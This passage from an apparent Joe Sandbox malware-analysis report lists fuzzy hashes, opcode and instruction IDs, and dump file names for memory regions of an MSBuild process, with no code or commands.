                                                                                                                                    • Instruction Fuzzy Hash: E8F0A032B006159FCB1A566AE4149AEB7AAEFC5735714407BE509EB350CF32DC428BA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf4aa5eecf17c43c18cb9454ad39e6e782dc327513a08104b8558c00243303df
                                                                                                                                    • Instruction ID: ffd8f1041d4c7e3dd8056eaf446ee2dcf0bcc5927c5c58b101b72b475e51dc51
                                                                                                                                    • Opcode Fuzzy Hash: cf4aa5eecf17c43c18cb9454ad39e6e782dc327513a08104b8558c00243303df
                                                                                                                                    • Instruction Fuzzy Hash: 39F0BB75A00108AF8751DF6ED841ADFBBF6FF88354B44452AE505E3301D7709511CBE5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da1316b15d81320af5ea5df62ea26ca124ab4225b70ab8df24389df000e05ca6
                                                                                                                                    • Instruction ID: ae4ce8b52be654992be49e902eaff01f7f57cec9e9318ecaeee7ea7fabd58eb9
                                                                                                                                    • Opcode Fuzzy Hash: da1316b15d81320af5ea5df62ea26ca124ab4225b70ab8df24389df000e05ca6
                                                                                                                                    • Instruction Fuzzy Hash: 17F0A571466B42CFE3512B20ACAD3EE7F32FB8B317B44AC81E00A85172DF3404458BA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 83b17660473754183b920b3f51fccda9423dbdf535071e6c9cc6886636c5b5d6
                                                                                                                                    • Instruction ID: 8991c5b3aa22f2087d7cf6a98ee677745144ee0924674c5765e3f7782c9da111
                                                                                                                                    • Opcode Fuzzy Hash: 83b17660473754183b920b3f51fccda9423dbdf535071e6c9cc6886636c5b5d6
                                                                                                                                    • Instruction Fuzzy Hash: 90F08271A002089F8B51DFADD8409EFBBF6FF88350B44452AD609E3301EA709915CBE5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a7b25fae68c1c8e6d530542a50860aa270e6215878d334b0235a8f3484d2d17f
                                                                                                                                    • Instruction ID: fcbed21b2b365a11acdc4218440ff981c643de9b21f3ecb8366a691e8f8ffcdf
                                                                                                                                    • Opcode Fuzzy Hash: a7b25fae68c1c8e6d530542a50860aa270e6215878d334b0235a8f3484d2d17f
                                                                                                                                    • Instruction Fuzzy Hash: BDE00975466B46CFE6146B74ADAC3BEBA76FB8B317B80AD10B00E81131DF7444948A94
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: be89c552d760f1fa42b2924efc367a16906fd3a264ce024c3da9dfd8198d9828
                                                                                                                                    • Instruction ID: 39cc57a1f135df313cfea2d3e401ee1c74c62649b5b90774eccac8d0507e0cde
                                                                                                                                    • Opcode Fuzzy Hash: be89c552d760f1fa42b2924efc367a16906fd3a264ce024c3da9dfd8198d9828
                                                                                                                                    • Instruction Fuzzy Hash: 56E0DF31E143AACACF02BBB0A8004EDBB34AEC2210B5A4597C064761A1EA30165DCBA2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8a41bb6c036705bc09c86a22bb0ae3761106a237ea17ede525a0396df6fc74a
                                                                                                                                    • Instruction ID: d710834d381a1695c3e8593ad08df67f8b65af633aa7a0c263548478e8752e7d
                                                                                                                                    • Opcode Fuzzy Hash: a8a41bb6c036705bc09c86a22bb0ae3761106a237ea17ede525a0396df6fc74a
                                                                                                                                    • Instruction Fuzzy Hash: BFD01231D2032A968B00A6E5DC044DEB738EED5261B914626D51437140EB70265986A1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cbda6efb0224b6bf69a5cffdada026c74c6bccb1d828027464156522ccf110b5
                                                                                                                                    • Instruction ID: 3d14d149646623c040fa0644d8f59ff27c6e58f2a05de579eab07bb28e3c05f5
                                                                                                                                    • Opcode Fuzzy Hash: cbda6efb0224b6bf69a5cffdada026c74c6bccb1d828027464156522ccf110b5
                                                                                                                                    • Instruction Fuzzy Hash: 7CC04CE491D3C15EDF2B573465750597F70AD46344F1558DED082C6093DA2681158B17